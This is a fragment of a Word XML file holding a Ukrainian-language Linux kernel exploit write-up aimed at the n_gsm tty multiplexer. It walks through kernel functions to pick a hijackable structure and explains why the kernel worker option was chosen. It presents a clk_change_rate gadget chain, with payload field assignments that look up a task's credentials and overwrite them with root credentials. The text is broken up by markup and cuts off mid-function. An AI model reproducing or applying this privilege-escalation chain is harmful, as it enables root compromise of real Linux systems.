                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dlci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-&gt;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Note that SABM UA .. SABM UA first UA lost can mean that we go</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">   open -&gt; open */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br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">del_timer(&amp;dlci-&gt;t1);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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* This will let a tty open continue */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br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;state = DLCI_OPEN;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;constipated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(debug &amp; DBG_ERRORS)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">pr_debug(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4"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"DLCI %d goes open.\n"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, dlci-&gt;addr);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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Send current modem state */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(dlci-&gt;addr) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_modem_update(dlci,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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Start keep-alive control */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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm-&gt;ka_num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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm-&gt;ka_retries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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">mod_timer(&amp;gsm-&gt;ka_timer,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">  jiffies + gsm-&gt;keep_alive * HZ /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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_data_kick(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">wake_up(&amp;dlci-&gt;gsm-&gt;event);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Ми можемо побачити що останньому рядку коду функції викликається wake_up(&amp;dlci-&gt;gsm-&gt;event); яка і прокидає нашу чергу очікувань. Після цього наш потік який очікував у wait_event_interruptible переходить до умови if.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19171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(need_open) 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(gsm-&gt;initiator)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_begin_open(dlci);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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_set_opening(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab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Звісно нам треба виконати умови аргументів, щоб need_open став true. Далі у нас постає вибір між gsm_dlci_begin_open та gsm_dlci_set_opening. Функція gsm_dlci_set_opening  просто встановлює стан DLCI на DLCI_OPENING. Тому в неї не має потенціалу. Внизу ви можете побачити її код.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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci_set_opening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(struct gsm_dlci *dlci)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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switch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(dlci-&gt;state)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DLCI_CLOSED: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DLCI_WAITING_CONFIG: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DLCI_CLOSING:</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;state = DLCI_OPENING;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default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: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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">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 в функції</w:t>
      </w:r>
      <w:hyperlink r:id="rId10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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gsm_dlci_begin_open</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> вже є потенціал для виконання корисних завдань. Тому нам треба перед заходом в gsm_dlci_config настроїти сам MUX, щоб значення initiator було true. Перейдемо до самої функції. Про аналізувавши функцію ми можемо побачити три варіанти за що можна зачепитись.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Підробити структуру work_struct для того, щоб скористатися нею в gsm_command-&gt;gsm_send-&gt;gsmld_write_trigger-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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schedule_work(&amp;gsm-&gt;tx_work).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Підробити структуру timer_list для того, щоб скористатись нею в mod_timer.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Підробити структуру wait_queue_head, щоб скористатись нею в gsm_dlci_close-&gt;wake_up_all(&amp;dlci-&gt;gsm-&gt;event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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Було обрано перший варіант з kernel worker. Аргументація чому два останніх не підходять.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci_begin_open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(struct gsm_dlci *dlci)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_mux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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dlci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?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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dlci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-&gt;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm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need_pn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(!gsm)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(dlci-&gt;addr !=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) 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(gsm-&gt;adaption !=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|| gsm-&gt;adaption != dlci-&gt;adaption)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_pn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(dlci-&gt;prio != (roundup(dlci-&gt;addr +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) -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))</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_pn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(gsm-&gt;ftype != dlci-&gt;ftype)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_pn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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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switch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(dlci-&gt;state)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DLCI_CLOSED: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DLCI_WAITING_CONFIG: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DLCI_CLOSING:</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;retries = gsm-&gt;n2;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(!need_pn) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;state = DLCI_OPENING;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_command(gsm, dlci-&gt;addr, SABM|PF);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}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{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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Configure DLCI before setup */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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;state = DLCI_CONFIGURE;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(gsm_dlci_negotiate(dlci) !=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) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_close(dlci);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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">mod_timer(&amp;dlci-&gt;t1, jiffies + gsm-&gt;t1 * HZ /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);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default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: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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">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Але перед цим потрібно розповісти про payload.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Є така корисна функція як clk_change_rate яка для нас є корисним гаджетом. Даний гаджет дозволяє виконувати функцію до трьох long аргументів, а також виконати функцію до двох аргументів, але записом поверненого значення в член структури який служить першим аргументом clk_change_rate. А також дана функція має рекурсивний виклик де аргументом наступного виклику буду член структури початкової функції.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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_change_rate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(struct clk_core *core)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">child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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_node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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">tmp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old_rate;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best_parent_rate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skip_set_rate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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">old_parent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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_core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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">parent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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">old_rate = core-&gt;rate;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(core-&gt;new_parent) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">parent = core-&gt;new_parent;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">best_parent_rate = core-&gt;new_parent-&gt;rate;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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(core-&gt;parent) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">parent = core-&gt;parent;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">best_parent_rate = core-&gt;parent-&gt;rate;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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(clk_pm_runtime_get(core))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(core-&gt;flags &amp; CLK_SET_RATE_UNGATE) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_core_prepare(core);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_core_enable_lock(core);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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(core-&gt;new_parent &amp;&amp; core-&gt;new_parent != core-&gt;parent) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">old_parent = __clk_set_parent_before(core, core-&gt;new_parent);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">trace_clk_set_parent(core, core-&gt;new_parent);</w:t>
              <w:br w:type="textWrapping"/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(core-&gt;ops-&gt;set_rate_and_parent) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">skip_set_rate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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">core-&gt;ops-&gt;set_rate_and_parent(core-&gt;hw, core-&gt;new_rate,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">best_parent_rate,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">core-&gt;new_parent_index);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}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(core-&gt;ops-&gt;set_parent) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">core-&gt;ops-&gt;set_parent(core-&gt;hw, core-&gt;new_parent_index);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">trace_clk_set_parent_complete(core, core-&gt;new_parent);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">__clk_set_parent_after(core, core-&gt;new_parent, old_parent);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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(core-&gt;flags &amp; CLK_OPS_PARENT_ENABLE)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_core_prepare_enable(parent);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">trace_clk_set_rate(core, core-&gt;new_rate);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(!skip_set_rate &amp;&amp; core-&gt;ops-&gt;set_rate)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">core-&gt;ops-&gt;set_rate(core-&gt;hw, core-&gt;new_rate, best_parent_rate);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">trace_clk_set_rate_complete(core, core-&gt;new_rate);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">core-&gt;rate = clk_recalc(core, best_parent_rate);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(core-&gt;flags &amp; CLK_SET_RATE_UNGATE) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_core_disable_lock(core);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_core_unprepare(core);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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(core-&gt;flags &amp; CLK_OPS_PARENT_ENABLE)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_core_disable_unprepare(parent);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(core-&gt;notifier_count &amp;&amp; old_rate != core-&gt;rate)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">__clk_notify(core, POST_RATE_CHANGE, old_rate, core-&gt;rate);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(core-&gt;flags &amp; CLK_RECALC_NEW_RATES)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/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)clk_calc_new_rates(core, core-&gt;new_rate);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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/*</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * Use safe iteration, as change_rate can actually swap parents</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * for certain clock types.</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> */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br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">hlist_for_each_entry_safe(child, tmp, &amp;core-&gt;children, child_node) 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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Skip children who will be reparented to another clock */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(child-&gt;new_parent &amp;&amp; child-&gt;new_parent != core)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continue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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_change_rate(child);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* handle the new child who might not be in core-&gt;children yet */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(core-&gt;new_child)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_change_rate(core-&gt;new_child);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">clk_pm_runtime_put(core);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Щоб за допомогою нашого гаджета виконати функцію на три аргументи, треба визначити такі дані структури через яких потік виконання перейде до цього рядку коду.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19171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(!skip_set_rate &amp;&amp; core-&gt;ops-&gt;set_rate)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">core-&gt;ops-&gt;set_rate(core-&gt;hw, core-&gt;new_rate, best_parent_rate);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Приклад використання:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12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19171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kernfs_payload.memcpy_cred.new_parent                  </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.rpm_enabled                 </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.flags                       </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.of_node_recalc_rate         </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.notifier_count              </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.children                    </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.rate                        </w:t>
              <w:tab/>
              <w:t xml:space="preserve">=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(struct cred_compact);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.parent                      </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= memcpy_cred_addr;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.new_rate                    </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= root_cred_addr;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.ops                         </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= set_arg_cred_addr + offset_ops;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.req_rate_set_rate           </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= memcpy_addr;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.memcpy_cred.new_child                   </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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Другий функціонал гаджету який дозволяє задати на виконання функцію з двама аргументами можемо пабачит ниже. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13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19171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core-&gt;rate = clk_recalc(core, best_parent_rate);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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clk_recalc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(struct clk_core *core,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 parent_rate)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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rate = parent_rate;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(core-&gt;ops-&gt;recalc_rate &amp;&amp; !clk_pm_runtime_get(core)) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">rate = core-&gt;ops-&gt;recalc_rate(core-&gt;hw, parent_rate);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_pm_runtime_put(core);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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rate;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Ми отримаємо повернене значення в сlk_core-&gt;rate.</w:t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Приклад використання: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19171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kernfs_payload.get_cred.new_parent                     </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.parent                         </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.rpm_enabled                    </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.flags                          </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.req_rate_set_rate              </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.notifier_count                 </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.children                       </w:t>
              <w:tab/>
              <w:t xml:space="preserve">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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.ops                            </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= get_cred_addr + offset_ops;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.of_node_recalc_rate            </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= get_task_cred_addr;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">kernfs_payload.get_cred.new_child                      </w:t>
              <w:tab/>
              <w:t xml:space="preserve">= set_arg_memcpy_addr;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Далі рекурсія котра дозволяє нам строїти ланцюг гаджетів які разом виконують корисний код. Дуже добре що вона знаходиться в самому кінці функції.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078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19171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(core-&gt;new_child)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">clk_change_rate(core-&gt;new_child);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Побудований корисний код з гаджетів clk_change_rate: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482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Задача даного коду це знайти за допомогою find_task_by_vpid структуру task_struct потім отримати структуру cred за допомогою функції get_task_cred. Потім переписуємо частину структури cred на свою частину. З випадком find_task_by_vpid та get_task_cred які повертають пойнтери на структури ми й використовуємо recalc_rate. Щоб передати отримані значення з функцій до аргументів других функцій просто вказуємо адресу члену структури rate в memcpy з розміром 8 байтів та копіюємо значення на адресу аргументу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:widowControl w:val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Тепер коли вам відомий підтекст я можу розпочати аргументацію чому було вибрано kernel worker. Почнемо з варіанту з таймером. Коли час таймера закінчується то перед заходом у функцію таймера, видаляється структура таймера зі списку таймерів які очікують. Для видалення таймера списку використовується функція </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">detach_timer().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19171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inline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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">detach_timer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(struct timer_list *timer,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 clear_pending)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_node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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">entry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= &amp;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">timer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-&gt;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">entry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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">debug_deactivate(timer);</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__hlist_del(entry);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(clear_pending)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">entry-&gt;pprev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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
